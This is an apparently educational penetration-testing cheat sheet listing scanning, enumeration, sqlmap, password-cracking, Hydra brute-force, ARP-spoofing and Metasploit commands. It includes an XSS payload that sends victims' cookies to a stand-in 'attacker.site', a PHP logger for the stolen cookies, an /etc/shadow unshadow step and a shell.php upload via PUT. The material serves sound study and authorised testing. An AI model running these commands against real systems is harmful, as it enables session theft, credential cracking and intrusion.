There are lots of resources out there that can help you get started in penetration testing. One of those resources is the WYWM potential platform, alongside the various junior penetration testing certifications. Recently I certified as a junior penetration tester. I realized that at the junior level there are not that many commands and tools a junior penetration tester needs to know; in fact, I was able to summarize all of them in the form of a cheat sheet. These are the commands I use every day, and having this cheat sheet saves a lot of time. If you know all the commands and tools below, this cheat sheet will prepare you for your first junior penetration testing certification.
Penetration testing is a lot more than just throwing commands against a machine.
I would highly suggest taking an ethical hacking course before attempting to use these commands/tools in real-life engagements. Neither I nor the company is responsible for misuse of these commands/tools; they are presented solely for educational purposes.
Also, before attempting any certification, you should practise all of these commands in some sort of a lab environment and understand how these tools/commands work together.
Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.
nmap Scan (Full)
nmap -sC -sV -p- 10.10.10.10
nmap Scan (UDP Partial)
nmap -sU -sV 10.10.10.10
nmap Scan (Partial)
nmap -sC -sV 10.10.10.10
nmap -O 10.10.10.10
Host Discovery
fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24 (skips the port scan phase)
netdiscover -r 10.10.10.0/24
The next set of commands should be used when attacking a web application. Actually understanding what these do, and not just throwing them against your target, is really important.
Netcat for HTTP services
nc -v 10.10.10.10 <port#>
HEAD / HTTP/1.0 (then press the Enter key twice)
OpenSSL for HTTPS services
openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0
Cross Site Scripting (XSS)
To send the cookie to an attacker-controlled site:
<script> var i = new Image(); i.src="http://attacker.site/log.php?q=" + document.cookie; </script>
The log.php page on the attacker's site (appends each received cookie value to a file):
<?php
$filename = "/tmp/log.txt";
$fp = fopen($filename, 'a');
$cookie = $_GET['q'];
fwrite($fp, $cookie . "\n");
fclose($fp);
?>
Web Server Fingerprinting
httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt
HTTP verbs: GET, POST, HEAD, PUT, DELETE, OPTIONS
Sending the OPTIONS verb shows which other verbs the server accepts:
nc 10.10.10.10 80
OPTIONS / HTTP/1.0
To upload a file over HTTP, use the PUT verb as follows:
wc -c shell.php
The command above gives the size of the payload in bytes (Content-Length counts bytes, so use -c rather than -m, which counts characters). Then send:
PUT /shell.php HTTP/1.0
Content-Type: text/html
Content-Length: <payload size>
(blank line, then the file contents)
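As an added example (not code from the original post), the raw HTTP/1.0 exchange above in Python: it builds the HEAD/OPTIONS/PUT request with a byte-accurate Content-Length, and parses the Allow header of an OPTIONS reply to flag verbs such as PUT and DELETE that a hardening review of your own server should question. The OPTIONS response is constructed for the example, not captured from a real host.

```python
# Verbs listed on the page; PUT and DELETE let a client change server
# content and are normally disabled on a production web root.
RISKY_VERBS = {"PUT", "DELETE"}


def build_request(method: str, path: str = "/", body: bytes = b"",
                  content_type: str = "text/html") -> bytes:
    """Build the raw HTTP/1.0 request that the page types into nc by hand.

    Content-Length is the body size in bytes (what `wc -c` reports), not
    characters, so a payload with multi-byte characters is counted correctly.
    """
    lines = [f"{method} {path} HTTP/1.0"]
    if body:
        lines.append(f"Content-Type: {content_type}")
        lines.append(f"Content-Length: {len(body)}")
    head = "\r\n".join(lines) + "\r\n\r\n"  # the blank line ends the headers
    return head.encode("ascii") + body


def parse_allow(response: bytes) -> set:
    """Return the verbs named in the Allow header of an OPTIONS response."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "allow":
            return {v.strip().upper() for v in value.split(",") if v.strip()}
    return set()


def risky_verbs(response: bytes) -> set:
    """Verbs in the Allow header that a hardening review should flag."""
    return parse_allow(response) & RISKY_VERBS


# Constructed sample OPTIONS response (not captured from a real host).
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: example\r\n"
    b"Allow: GET, HEAD, POST, OPTIONS, PUT, DELETE\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(build_request("OPTIONS").decode())
    print("Allowed:", sorted(parse_allow(SAMPLE_OPTIONS_RESPONSE)))
    print("Flag for hardening:", sorted(risky_verbs(SAMPLE_OPTIONS_RESPONSE)))
```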
Directory and File Scanning
dirb http://10.10.10.10
dirsearch.py -u http://10.10.10.10 -e '*'
gobuster dir -u http://10.10.10.10 -w /path/to/wordlist.txt
dirbuster
nikto -h 10.10.10.10
SQL Injection with sqlmap
sqlmap -u http://10.10.10.10 -p <parameter>
sqlmap -u http://10.10.10.10 --data <POST string> -p <parameter>
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
Order to use them in:
# to identify databases
sqlmap -u http://10.10.10.10 --dbs
# to identify tables
sqlmap -u http://10.10.10.10 -D <name of db> --tables
# to dump a table
sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump
This portion covers system attacks; it is very important to understand how to execute brute-force attacks and how to run exploits.
Password Cracking with John the Ripper
unshadow /etc/passwd /etc/shadow > password.txt
john password.txt
john --show password.txt
john --wordlist=/path/to/wordlist --users=users.txt hashfile
Brute Forcing with Hydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
Metasploit Console
search <name of exploit>
use <name of exploit>
info
show options
show advanced options
set RHOST 10.10.10.10
set payload <name of payload>
exploit
background
sessions -l
sessions -i 1
I would practise routing if you are planning to take any junior penetration tester certification. Here is a command to remember:
ip route add <destination> via <gateway>
ip route add 10.10.10.10 via 192.168.0.1